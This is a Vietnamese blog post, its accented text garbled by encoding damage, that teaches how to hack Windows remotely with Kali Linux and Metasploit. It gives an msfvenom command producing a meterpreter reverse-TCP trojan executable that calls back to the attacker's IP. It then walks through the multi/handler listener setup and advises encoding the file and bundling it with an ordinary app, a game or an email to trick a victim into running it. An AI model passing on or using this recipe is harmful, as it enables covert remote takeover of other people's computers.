L�m th? n�o d? HACK WINDOWS s? d?ng Kali Linux t? xa v?i Metasploit - 2016
T?o Trojan
T?o payload s? d?ng msfvenom. thi?t l?p c�c c?ng 444 v� ip IP c�ng c?ng c?a b?n ho?c IP d?a phuong ph? thu?c v�o M?C TI�U .trojan t?o ra c?a b?n s? c? g?ng d? k?t n?i v?i IP n�y v� c?ng khi th?c hi?n n�. l?nh sau s? t?o ra c�c trojan trong d?nh d?ng .exe.
# msfvenom -p windows/meterpreter/reverse_tcp � platform windows-a x86 -f exe LHOST=�attacker ip� LPORT=444 -o /root/Desktop/trojan.exe
M?t Trojan s? du?c t?o ra trong m�y t�nh d? b�n. gi? cho n� sang m?t b�n v� ti?p t?c d?n ph?n x? l� ti?p
# msfconsole
Ch? m?t ph�t, msfconsole t? auto :) sau d�, d?t payload v� c?ng.
1. Handler
msf> use multi/handler
2. set payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
3. Set local port
msf exploit(handler) > set LPORT 444
4. Set local host
msf exploit(handler) > set LHOST �attacker ip�
5. exploit
msf exploit(handler) > exploit
Ch? cho m?c ti�u k?t n?i tr? l?i
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler�
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler�
Th?c hi?n c�c Payload
B�y gi? b?n ph?i th?c hi?n trojan c?a b?n tr�n h? th?ng . c�c t?p tin exe "th� so "l� m?t � tu?ng t?i, h�y m� h�a n� nh� m.n v� d�nh k�m v?i m?t ?ng d?ng b�nh thu?ng hay m?t tr� choi ho?c th?m ch� c? email.
Ai kh�ng hi?u xem video nh� !!!
No comments: